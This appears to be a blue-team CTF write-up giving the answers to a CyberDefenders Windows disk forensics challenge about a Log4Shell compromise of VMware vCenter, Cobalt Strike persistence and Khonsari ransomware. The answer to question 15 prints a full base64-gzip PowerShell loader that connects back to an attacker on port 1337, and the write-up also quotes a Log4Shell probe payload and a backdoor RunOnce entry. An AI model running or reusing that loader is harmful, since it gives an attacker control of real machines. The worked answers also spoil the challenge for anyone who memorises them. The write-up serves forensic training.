Windows Disk Image Forensics — DetectLog4j (CyberDefenders BlueTeam CTF)
On December 9, 2021, a critical vulnerability in the popular Log4j Java logging library was disclosed and nicknamed Log4Shell. The vulnerability is tracked as CVE-2021–44228 and is a remote code execution vulnerability that can give an attacker full control of any impacted system. A challenge for windows disk forensics detecting log4j exploits was released on CyberDefenders
https://cyberdefenders.org/blueteam-ctf-challenges/86
This is a blueteam CTF which is made for security researchers, SOC practitioners to practice analyzing abilities
#1 What is the computer hostname?
check operating system information , we got the hostname vcw65
#2 What is the Timezone of the compromised machine?
Windows\System32\config
click System, controlset001, control , timezoneinformation
pacific standard time : UTC-8
#3 What is the current build number on the system?
Windows\System32\config
click software , Microsoft > Windows NT
current version : 14393
#4 What is the computer IP?
Windows\System32\config
click system
ControlSet001 > Services > Tcpip
DhcpIPAddress REG_SZ 192.168.112.139
#5 What is the domain computer was assigned to?
cyberdefenders.org
Windows\System32\config
System
ControlSet001 > Services > Tcpip> Winsock
#6 When was myoussef user created?
Go to OS Accounts on the left column,
Search for myoussef
found the creation time , 2021–12–28 14:57:23 CST . submitted but failed then change the time to UTC 2021–12–28 06:57:23 UTC it works!
#7 What is the user mhasan password hint?
Go to OS Accounts, search for mhasan
password hint is : https://www.linkedin.com/in/0xmohamedhasan/
#8 What is the version of the VMware product installed on the machine?
Data Artifacts > Installed Programs
search for VMware product , version is 6.7.0.40322
#9 What is the version of the log4j library used by the installed VMware product?
Go to Program Files\VMWare\vCenter Server\common-jars
log4j 2.11.2
#10 What is the log4j library log level specified in the configuration file?
keyword search for ‘log4j’ , click log4j.properties
INFO level
#11 The attacker exploited log4shell through an HTTP login request. What is the HTTP header used to inject payload?
Google “vcenter log4j exploit”
“The vulnerability is in the X-Forwarded-For header on the vCenter SSO login page…” , so HTTP header should be X-Forwarded-For
#12 The attacker used the log4shell.huntress.com payload to detect if vcenter instance is vulnerable. What is the first link of the log4huntress payload?
keyword search for ‘log4shell.huntress.com’
click on websso.log and we get the payload
log4shell.huntress.com:1389/b1292f3c-a652–4240–8fb4–59c43141f55a
#13 When was the first successful login to vsphere WebClient?
ProgramData\VMWare\vCenterServer\runtime\VMWareSTSService\logs
click audit_events.log
first sucess login : 12/28/2021 12:39:29 PST
submitted with UTC format 28/12/2021 20:39:29 UTC
#14 What is the attacker’s IP address?
look for attacker’s IP in audit_events.log
192.168.112.128
#15 What is the port the attacker used to receive the cobalt strike reverse shell?
Windows\System32\winevt\Logs
Microsft-Windows-PowerShell%4Operational.evtx
look for base64 strings path
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAAAAAAANVWaW/iSBD9HH6FN0Ia0CQcCeQajTRtsMEeTDDGNgRFK2M3pqF9jN3mmNH89y0fYYdkd1ba1a60LaF2N1Wv3qu+SsPsUmMRsZkSOJi7NHAUk8DnrkqlMia2FXEfuXfvYNANJAbfn96VylYcY29BD+nwvHSWxMR3Oe0QM+x9OB3WxonPiIdrks9wFIQajrbExjGY+ZaH49CyMUf8NbYZ9610dhYmC0pszqYQglsmvp3Nns1FarnxM1f8jf3E4xClgW0x4Do5hJj7xnUCzyMpxca+2Wg0LrgxjiEczmauYIb7/mdYCvaC6DCKAgZEUvXfOGGP7YThMbYcMyIsR2n9BGMCMrkHLiE+SOEkf0n8FzexaIVzl1LJC4OIVc43OPIxvb6qOZSeV4+AMQNhgLuHpPmAxUYs4gwSscSime5KMUdD5DgRjuOLPLCz08hXXAyW9DRHx+lCaPXDP6HTibDF8GQFnfM7nXyMGOyoBaTvB17Msjc5uaMxzEXsKOA4PbIi2BsQ6+icxQIVWdp/sMyjSc7fVJKCmxZhYhBpsGcpflykO/FFzapv+Q4FwtnSOjuFUEpibAe+E2cRYTm/l84/weGwAy8kFKeHZYh3lzkOpxA7CuJgyWodbWVFYdF14KDBEmyJg6NSOUzVxqeOxeFJDbtB2ufox49jhuIX/9oYL3GEfRs7KD+dBMc1yO3Y8l1c+VQ5LzDTfFxw81Gch3quFeaH2qDYKtXqEbSHfRzBKkt+fkKAZXkSJbhUhiVLaHrYjtJfyL3giVHgaUES2bhSwF1wx5ujWirN+QPD8+fn8taKfrXTu+cjNz8K97c4Ys8PDykKb8X4ppVeUr5bOa8LpNsedYMDgiaIY9XgNd14khRHpprEtJlABvpqJZGm5ML4oAvuiDXCz5NJX9a6fRR196slkmJJ6PMHtckju09uDZnXdfAjnYG63kvI4T136s46O7lpBwkiWSwi7vpjX0N9VZeY1BO0gdrhZeR018ZmXT/ovcFQWoHv01CxqaTYnVi1+3JXF/jdZO06S1FBjd2mI+jtxnQ6MzP/sZzGUmexoqVjfp+OebLTpDSOaqx4U2w/mRtxphqUNzeke9vheX1bd01BhHkyEBI6qkObmgHSFu1ry2yHC89oQG5MbeZ7E8nfq4tQcQ6zfv3ekDJujgwc+ZQnrwuiqi6CG8P3/Pr9NLKboURskU+6GxGhwkYXx5Y7hL53Y7S85X5bN26adKFJPg851SDOLM2v7rkIeaCQynySMGOw3tabOpH3wHvX5L906L1ElqJEnFDe33VT2vXML7UnjV6vD/azKeq2TAepCGmj+qjb0pT0++Z+FLaRgNAjIanfoNEe2fod+vcbb9hXxmGgi/6T2W48En64uA7DRW+/GnxVE6WDgtnVPbN7YsMy5fhpErsTYyiPNdQarNGtJDqwHuOtc624E6q6Q621fzzwuu3RTYqXYXRjVzPb3qLJr5yemyhkM+y4/4G0/3FTF7c7Zslmvqe9G1gnOKO9VtpB31ZR1t+Yn8eT9rJuaPJwojeI3IbfHezJqw3YdlIbT34P+1oILbkF+1qTRoIkTZEzePLIzpGQ/Qjnfjo1xdVMQ3oWW1dGgV+/rte/Cm2FtPbDNazZRDgM1sLhseB3DndceZEsl9mrMM+LnFpa08C1dvKWQ6lyvARrA+y7bMW955oXJ07vT99ywHgpby4Xj9FfmOal0SvA10UP2L0ueqolsuQqcz4I6PMvhZgqVDels7JLg4VFH47vwPUHmI0wS+BdLX0vzX9e/9UUK4pXFs24hYfKUf8Fl2Yjj/Q2LdXSPH+bn7kyy97+t6k9qUsap3j5sHEqKweqppXmG1W3p6qKZ+/qbdQ/KiMK5FdpT4sJcHgpEKuld1BASCmfQtrDQwxlEneJv3B3GStJmHJZ+Q0MfgPEWlHOrwsAAA=="))
decode with cyberchef , choose from base64 and gunzip
Download the decoded command and save it with a .ps1 extension
download https://github.com/mandiant/flare-fakenet-ng
The tool allows you to intercept and redirect all or specific network traffic while simulating legitimate network services. Using FakeNet-NG, malware analysts can quickly identify malware’s functionality and capture network signatures. Penetration testers and bug hunters will find FakeNet-NG’s configurable interception engine and modular framework highly useful when testing application’s specific functionality and prototyping PoCs.
run the malscript.ps1 while running fakenet.exe
we see the malware connects to the host on port 1337
#16 What is the script name published by VMware to mitigate log4shell vulnerability?
vc_log4j_mitigator.py
https://kb.vmware.com/s/article/87081
#17 In some cases, you may not be able to update the products used in your network. What is the system property needed to set to ‘true’ to work around the log4shell vulnerability?
log4j2.formatMsgNoLookups
If updating to the latest version is not possible the vulnerability can be mitigated by removing the JndiLookup class from the class path. Additionally, the issue can be mitigated on Log4j versions >=2.10 by setting the system property log4j2.formatMsgNoLookups or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to true.
https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/
#18 What is the log4j version which contains a patch to CVE-2021–44228?
2.15.0
#19 Removing JNDIlookup.class may help in mitigating log4shell. What is the sha256 hash of the JNDILookup.class?
Program Files\VMWare\vCenter Server\VMWare Identity Services\log4j-core-2.11.2.jar
extract log4j-core-s.11.2.jar (right click with the file)
extract the exported jar file
locate the jndi.lookup class
get the file hash
0f038a1e0aa0aff76d66d1440c88a2b35a3d023ad8b2e3bac8e25a3208499f7e
#20 Analyze JNDILookup.class. What is the value stored in the CONTAINER_JNDI_RESOURCE_PATH_PREFIX variable?
Program Files\VMWare\vCenter Server\cm\lib\log4j-core.jar
static final String CONTAINER_JNDI_RESOURCE_PATH_PREFIX = java:comp/env/;#21 What is the executable used by the attacker to gain persistence?
Users/Administrator.WIN-B633EO9K91M
click NTUSER.DAT
SOFTWARE > Microsoft > Windows > CurrentVersion
click RunOnce
p33r REG_SZ C:\Users\Adiminstrator\Desktop\baaaackdooor.exe
#22 When was the first submission of ransomware to virustotal?
The ransomware is khonsari.exe, search on virustotal and found the first submiss 2021–12–11 22:57:01
#23 The ransomware downloads a text file from an external server. What is the key used to decrypt the URL?
search on bazaar malware database
download the malware sample (make sure do this in a safe environment)
download tool dnSpy
dnSpy is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don’t have any source code available.
upload the malware to dnSpy
right click dorfier and go to entry point
got the text ‘GoaahQrC’
#24 What is the ISP that owns that IP that serves the text file?
search on virustotal
we see the contaced domains is a cloud server address from amazon
#25 The ransomware check for extensions to exclude them from the encryption process. What is the second extension the ransomware checks for?
ini
after downloading the string, the malware looks for drive and mount to it
then encrypt all contents found
from the article khonsari ransomware analysis, we could see its behavior
